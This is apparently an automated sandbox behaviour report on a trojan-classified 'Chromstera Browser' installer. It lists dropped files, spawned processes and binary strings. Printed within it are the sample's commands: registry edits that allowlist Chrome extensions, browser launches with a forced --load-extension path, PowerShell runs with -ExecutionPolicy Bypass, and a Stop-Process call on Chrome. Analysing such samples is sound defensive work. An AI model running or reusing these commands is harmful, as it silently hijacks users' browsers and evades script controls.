                      Source: C:\Users\user\Desktop\setup.exe Code function: 3_2_00BB6670 SysFreeString,NtdllDefWindowProc_W,GlobalAlloc,GlobalLock,GlobalUnlock,SysFreeString,NtdllDefWindowProc_W,SysFreeString
                      Source: C:\Users\user\Desktop\setup.exe Code function: 3_2_00C177A0 NtdllDefWindowProc_W
                      Source: C:\Users\user\Desktop\setup.exe Code function: 3_2_00C689B0 NtdllDefWindowProc_W
                      Source: C:\Users\user\Desktop\setup.exe Code function: 3_2_00BB9920 NtdllDefWindowProc_W
                      Source: C:\Users\user\Desktop\setup.exe Code function: 3_2_00BB6CD0 NtdllDefWindowProc_W
                      Source: C:\Users\user\Desktop\setup.exe Code function: 3_2_00BB8C40 NtdllDefWindowProc_W
                      Source: C:\Users\user\Desktop\setup.exe Code function: 3_2_00BC3E40 NtdllDefWindowProc_W,DeleteCriticalSection
                      Source: C:\Users\user\Desktop\setup.exe Code function: 3_2_00BB5FA7 NtdllDefWindowProc_W,GlobalAlloc,GlobalLock,GlobalUnlock,NtdllDefWindowProc_W
                      Source: C:\Users\user\Desktop\setup.exe Code function: 3_2_00BD6FE0 NtdllDefWindowProc_W
                      Source: C:\Users\user\Desktop\setup.exe Code function: 3_2_00BBFF50 NtdllDefWindowProc_W
                      Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\6bc77d.msi
                      Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIC933.tmp
                      Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIC9EF.tmp
                      Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSICA7D.tmp
                      Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSICAEB.tmp
                      Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSICB79.tmp
                      Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSICBB9.tmp
                      Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi
                      Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\SourceHash{441BEFA6-D7B1-4C8C-8CF9-5A4D6215E43D}
                      Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSICC46.tmp
                      Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSICC66.tmp
                      Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSID04F.tmp
                      Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSID11C.tmp
                      Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIEC26.tmp
                      Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI11D0.tmp
                      Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI4739.tmp
                      Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIFB77.tmp
                      Source: C:\Windows\SysWOW64\msiexec.exe File created: C:\Windows\SystemTemp\msiD25B.tmp
                      Source: C:\Windows\SysWOW64\msiexec.exe File created: C:\Windows\SystemTemp\scrD25C.tmp
                      Source: C:\Windows\SysWOW64\msiexec.exe File created: C:\Windows\SystemTemp\scrD25D.tmp
                      Source: C:\Windows\SysWOW64\msiexec.exe File created: C:\Windows\SystemTemp\scrD25C.ps1
                      Source: C:\Windows\SysWOW64\msiexec.exe File created: C:\Windows\SystemTemp\scrD25D.txt
                      Source: C:\Windows\SysWOW64\msiexec.exe File created: C:\Windows\SystemTemp\msiD25B.txt
                      Source: C:\Windows\SysWOW64\msiexec.exe File created: C:\Windows\SystemTemp\pssD27D.tmp
                      Source: C:\Windows\SysWOW64\msiexec.exe File created: C:\Windows\SystemTemp\pssD27E.tmp
                      Source: C:\Windows\SysWOW64\msiexec.exe File created: C:\Windows\SystemTemp\ProD28F.tmp
                      Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                      Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSIC933.tmp
                      Source: setup.exe, 00000000.00000003.1719958497.0000000005251000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewininet.dllD vs setup.exe
                      Source: setup.exe, 00000000.00000002.2952945604.0000000006B17000.00000002.00000001.00040000.00000012.sdmpBinary or memory string: OriginalFilenameSoftwareDetector.dllF vs setup.exe
                      Source: setup.exe, 00000000.00000002.2952945604.0000000006B17000.00000002.00000001.00040000.00000012.sdmpBinary or memory string: OriginalFilenameaischeduler.dllF vs setup.exe
                      Source: setup.exe, 00000000.00000002.2952945604.0000000006B17000.00000002.00000001.00040000.00000012.sdmpBinary or memory string: OriginalFilenamePrereq.dllF vs setup.exe
                      Source: setup.exe, 00000000.00000002.2952945604.0000000006B17000.00000002.00000001.00040000.00000012.sdmpBinary or memory string: OriginalFilenamePowerShellScriptLauncher.dllF vs setup.exe
                      Source: setup.exe, 00000000.00000002.2952945604.00000000067F0000.00000002.00000001.00040000.00000012.sdmpBinary or memory string: OriginalFilenameviewer.exeF vs setup.exe
                      Source: setup.exe, 00000000.00000002.2952945604.00000000067F0000.00000002.00000001.00040000.00000012.sdmpBinary or memory string: OriginalFilenameMsiTempFiles.dllF vs setup.exe
                      Source: setup.exe, 00000000.00000002.2952945604.00000000067F0000.00000002.00000001.00040000.00000012.sdmpBinary or memory string: OriginalFilenamelzmaextractor.dllF vs setup.exe
                      Source: setup.exe, 00000000.00000002.2952945604.00000000067F0000.00000002.00000001.00040000.00000012.sdmpBinary or memory string: OriginalFilenameAICustAct.dllF vs setup.exe
                      Source: setup.exe, 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameChromnius-Main.exeF vs setup.exe
                      Source: setup.exe, 00000000.00000002.2952714019.000000000628A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileNameChromnius- vs setup.exe
                      Source: setup.exe, 00000003.00000002.2951398540.0000000004B90000.00000002.00000001.00040000.00000012.sdmpBinary or memory string: OriginalFilenameviewer.exeF vs setup.exe
                      Source: setup.exe, 00000003.00000002.2951398540.0000000004B90000.00000002.00000001.00040000.00000012.sdmpBinary or memory string: OriginalFilenameMsiTempFiles.dllF vs setup.exe
                      Source: setup.exe, 00000003.00000002.2951398540.0000000004B90000.00000002.00000001.00040000.00000012.sdmpBinary or memory string: OriginalFilenamelzmaextractor.dllF vs setup.exe
                      Source: setup.exe, 00000003.00000002.2951398540.0000000004B90000.00000002.00000001.00040000.00000012.sdmpBinary or memory string: OriginalFilenameAICustAct.dllF vs setup.exe
                      Source: setup.exe, 00000003.00000002.2951398540.0000000004EB7000.00000002.00000001.00040000.00000012.sdmpBinary or memory string: OriginalFilenameSoftwareDetector.dllF vs setup.exe
                      Source: setup.exe, 00000003.00000002.2951398540.0000000004EB7000.00000002.00000001.00040000.00000012.sdmpBinary or memory string: OriginalFilenameaischeduler.dllF vs setup.exe
                      Source: setup.exe, 00000003.00000002.2951398540.0000000004EB7000.00000002.00000001.00040000.00000012.sdmpBinary or memory string: OriginalFilenamePrereq.dllF vs setup.exe
                      Source: setup.exe, 00000003.00000002.2951398540.0000000004EB7000.00000002.00000001.00040000.00000012.sdmpBinary or memory string: OriginalFilenamePowerShellScriptLauncher.dllF vs setup.exe
                      Source: setup.exe, 00000003.00000000.1739888347.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameChromnius-Main.exeF vs setup.exe
                      Source: setup.exe, 00000003.00000003.1746421738.00000000039F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewininet.dllD vs setup.exe
                      Source: setup.exeBinary or memory string: OriginalFileNameChromnius-Main.exeF vs setup.exe
                      Source: setup.exeBinary or memory string: OriginalFilenameviewer.exeF vs setup.exe
                      Source: setup.exeBinary or memory string: OriginalFilenameMsiTempFiles.dllF vs setup.exe
                      Source: setup.exeBinary or memory string: OriginalFilenamelzmaextractor.dllF vs setup.exe
                      Source: setup.exeBinary or memory string: OriginalFilenameAICustAct.dllF vs setup.exe
                      Source: setup.exeBinary or memory string: OriginalFilenameSoftwareDetector.dllF vs setup.exe
                      Source: setup.exeBinary or memory string: OriginalFilenameaischeduler.dllF vs setup.exe
                      Source: setup.exeBinary or memory string: OriginalFilenamePrereq.dllF vs setup.exe
                      Source: setup.exeBinary or memory string: OriginalFilenamePowerShellScriptLauncher.dllF vs setup.exe
                      Source: setup.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "1" /t REG_SZ /d /f
                      Source: shi3105.tmp.0.drBinary string: \Device\NameResTrk\RecordNrtCloneOpenPacket
                      Source: classification engineClassification label: mal81.troj.evad.winEXE@150/138@11/5
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00CCEF90 FormatMessageW,GetLastError,0_2_00CCEF90
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_00147B20 CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,GetWindowThreadProcessId,GetWindowTextW,GetWindowLongW,GetWindowLongW,GetWindowLongW,GetWindowLongW,8_2_00147B20
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00D16E40 CoCreateInstance,0_2_00D16E40
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00BAA160 LoadResource,LockResource,SizeofResource,0_2_00BAA160
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Chromstera Browser
                      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Roaming\Chromstera Solutions
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7848:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5000:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6504:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2120:120:WilError_03
                      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\shi3105.tmp
                      Source: C:\Windows\Installer\MSI4739.tmpProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\chrome.bat" "
                      Source: setup.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\setup.exeFile read: C:\Users\desktop.ini
                      Source: C:\Users\user\Desktop\setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: setup.exeReversingLabs: Detection: 41%
                      Source: ChromsteraUpdater.exeString found in binary or memory: -startminimized
                      Source: ChromsteraUpdater.exeString found in binary or memory: /install
                      Source: ChromsteraUpdater.exeString found in binary or memory: -startappfirst
                      Source: ChromsteraUpdater.exeString found in binary or memory: -installready
                      Source: ChromsteraUpdater.exeString found in binary or memory: /installservice
                      Source: setup.exeString found in binary or memory: $domain = "https://www.chromstera.com/installer/";
                      Source: setup.exeString found in binary or memory: Stop-Process -Name 'chrome';AI_DeleteCadLzmaDeleteLZMAFilesProcessTasksExtractLZMAFilesAI_DeleteRCadLzmaAI_PRESERVE_INSTALL_TYPEPreserveInstallTypeOnDetectSoftwareUpdateInstallModeAI_EnableDebugLogEnableDebugLogAI_DpiContentScaleDpiContentScaleSET_TARGETDIR_TO_APPDIRLaunchExeWithDirectory"[TempFolder]\browser.data" --system-levelScheduleTasksAI_ExtractCadLzmaDoEventsExtractSourceFilesAI_FindExeLzmaFindEXEAI_PREPARE_UPGRADEPrepareUpgradeAI_RESTORE_LOCATIONRestoreLocationAI_RESTORE_AI_SETUPEXEPATH[AI_SETUPEXEPATH_ORIGINAL]RemoveAllTempFilesDeleteTasksLaunchLogFileAI_STORE_LOCATIONARPINSTALLLOCATIONAI_UPDATER_UNINSTALL/clean silentUninstallTasksChrome/EnforcedRunAsAdmin /RunAsAdmin /HideWindow /dir "[TempFolder]" "[AI_CHROME.BAT]"Edge/EnforcedRunAsAdmin /RunAsAdmin /HideWindow /dir "[TempFolder]" "[AI_EDGE.BAT]"AI_SET_PATCHSET_APPDIR[ProgramFilesFolder]\[ProductName]SET_SHORTCUTDIRSHORTCUTDIR[ProgramMenuFolder][ProductName]AI_CORRECT_INSTALL{}AI_ADMINAI_SET_MAINTDetectModernWindowsAI_DETECT_WINTHEMEDetectWindowsThemeAI_DATA_SETTER_8[AI_Init_WelcomeDlg][ProductName] [Setup]Installer InformationCertSourceDirAPPDIR:.TempFolderTEMPFO~1|TempFolderWindowsVolumeWINDOW~1|WindowsVolumeAPPS-H~1|apps-helper{{Fatal error: }}{{Error [1]. }}Invalid CRC checksum value for [2] file.{ Its header says [3] for checksum, its computed value is [4].}The file '[2]' cannot be installed because the file cannot be found in cabinet file '[3]'. This could indicate a network error, an error reading from the CD-ROM, or a problem with this package.Warning [1]. Bad foreign key ('[2]') in '[3]' column of the '[4]' table.The installer has insufficient privileges to access this directory: [2]. The installation cannot continue. Log on as administrator or contact your system administrator.Info [1]. 
Could not enumerate subfolders for folder: [2].Action not found: [2].The installer has encountered an unexpected error installing this package. This may indicate a problem with this package. The error code is [1]. {{The arguments are: [2], [3], [4]}}You must restart your system for the configuration changes made to [2] to take effect. Click "Yes" to restart now or "No" if you plan to manually restart later.CreateNewDialog failed for the dialog [2].{{Disk full: }}Custom action [2] not found in Binary table stream.Changing the text font to [2] failed.Failed to correctly move [2] file: CRC error.Action [Time]: [1]. [2]Bad value in database. Table: '[2]'; Primary key: '[3]'; Column: '[4]'[ProductName]The file [2] is missing.{[2]}{, [3]}{, [4]}Configuration failed.Message type: [1], Argument: [2]Source file not found{{(cabinet)}}: [2]. Verify that the file exists and that you can access it.=== Logging started: [Date] [Time] ====== Logging stopped: [Date] [Time] ===An error occurred while writing installation information to disk. Check to make sure enough disk space is available, and click "Retry", or "Cancel" to end the install.Drive not ready: [2].Error reading from file [2]. {{ System err
                      Source: setup.exeString found in binary or memory: start "" "msedge" --profile-directory="Default" --no-startup-window --load-extension="%systemdrive%\apps-helper"
                      Source: setup.exeString found in binary or memory: start "" "%chrome_exe%" --profile-directory="Default" --no-startup-window --load-extension="%systemdrive%\apps-helper"
                      Source: C:\Users\user\Desktop\setup.exeFile read: C:\Users\user\Desktop\setup.exe
                      Source: unknownProcess created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe"
                      Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding DD3B85FC1F11BB110F90DDDEF4702234 C
                      Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe" /i "C:\Users\user\AppData\Roaming\Chromstera Solutions\Chromstera Browser 1.0.0.0\install\Chromnius-Main.msi" AI_EUIMSI=1 APPDIR="C:\Program Files (x86)\Chromstera Browser" SECONDSEQUENCE="1" CLIENTPROCESSID="7404" AI_MORE_CMD_LINE=1
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding C76E3ECFDACF14783EC0EC85D3ECBB2C
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding CB2789DE8A953DFC6FBB92EF73C3F598 E Global\MSI0000
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Windows\SystemTemp\pssD27E.ps1" -propFile "C:\Windows\SystemTemp\msiD25B.txt" -scriptFile "C:\Windows\SystemTemp\scrD25C.ps1" -scriptArgsFile "C:\Windows\SystemTemp\scrD25D.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exe "C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exe"
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssED0B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiECF7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrECF8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrECF9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss1394.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi1332.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr1333.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr1334.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI4739.tmp "C:\Windows\Installer\MSI4739.tmp" /EnforcedRunAsAdmin /RunAsAdmin /HideWindow /dir "C:\Users\user\AppData\Local\Temp\" "C:\Users\user\AppData\Local\Temp\chrome.bat"
                      Source: C:\Windows\Installer\MSI4739.tmpProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\chrome.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "1" /t REG_SZ /d /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "\Google\Chrome\Extensions\" /v "path" /t REG_SZ /d /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "\Google\Chrome\Extensions\" /v "version" /t REG_SZ /d /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "1" /t REG_SZ /d /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "\Google\Chrome\Extensions\" /v "path" /t REG_SZ /d /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "\Google\Chrome\Extensions\" /v "version" /t REG_SZ /d /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\apps-helper"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2012,i,10222868034098351333,13685129222229150854,262144 /prefetch:8
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --no-startup-window /prefetch:5
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2012,i,17522224552689378138,6417613085102451852,262144 /prefetch:8
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --no-startup-window /prefetch:5
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1992,i,14024855596687576691,10802708795507051728,262144 /prefetch:8
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 5
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIFB77.tmp "C:\Windows\Installer\MSIFB77.tmp" /EnforcedRunAsAdmin /RunAsAdmin /HideWindow /dir "C:\Users\user\AppData\Local\Temp\" "C:\Users\user\AppData\Local\Temp\edge.bat"
                      Source: C:\Windows\Installer\MSIFB77.tmpProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\edge.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe" /i "C:\Users\user\AppData\Roaming\Chromstera Solutions\Chromstera Browser 1.0.0.0\install\Chromnius-Main.msi" AI_EUIMSI=1 APPDIR="C:\Program Files (x86)\Chromstera Browser" SECONDSEQUENCE="1" CLIENTPROCESSID="7404" AI_MORE_CMD_LINE=1Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding DD3B85FC1F11BB110F90DDDEF4702234 CJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding C76E3ECFDACF14783EC0EC85D3ECBB2CJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding CB2789DE8A953DFC6FBB92EF73C3F598 E Global\MSI0000Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI4739.tmp "C:\Windows\Installer\MSI4739.tmp" /EnforcedRunAsAdmin /RunAsAdmin /HideWindow /dir "C:\Users\user\AppData\Local\Temp\" "C:\Users\user\AppData\Local\Temp\chrome.bat"Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIFB77.tmp "C:\Windows\Installer\MSIFB77.tmp" /EnforcedRunAsAdmin /RunAsAdmin /HideWindow /dir "C:\Users\user\AppData\Local\Temp\" "C:\Users\user\AppData\Local\Temp\edge.bat"Jump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssED0B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiECF7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrECF8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrECF9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."Jump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss1394.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi1332.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr1333.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr1334.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."Jump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Windows\SystemTemp\pssD27E.ps1" -propFile "C:\Windows\SystemTemp\msiD25B.txt" -scriptFile "C:\Windows\SystemTemp\scrD25C.ps1" -scriptArgsFile "C:\Windows\SystemTemp\scrD25D.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."Jump to behavior
                      Source: C:\Windows\Installer\MSI4739.tmpProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\chrome.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "1" /t REG_SZ /d /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "\Google\Chrome\Extensions\" /v "path" /t REG_SZ /d /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "\Google\Chrome\Extensions\" /v "version" /t REG_SZ /d /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "1" /t REG_SZ /d /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "\Google\Chrome\Extensions\" /v "path" /t REG_SZ /d /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "\Google\Chrome\Extensions\" /v "version" /t REG_SZ /d /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\apps-helper"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout 5
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2012,i,10222868034098351333,13685129222229150854,262144 /prefetch:8
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --no-startup-window /prefetch:5
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2012,i,17522224552689378138,6417613085102451852,262144 /prefetch:8
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1992,i,14024855596687576691,10802708795507051728,262144 /prefetch:8
                      Source: C:\Windows\Installer\MSIFB77.tmp Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\edge.bat" "
                      Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: windowscodecs.dllJump to behavior
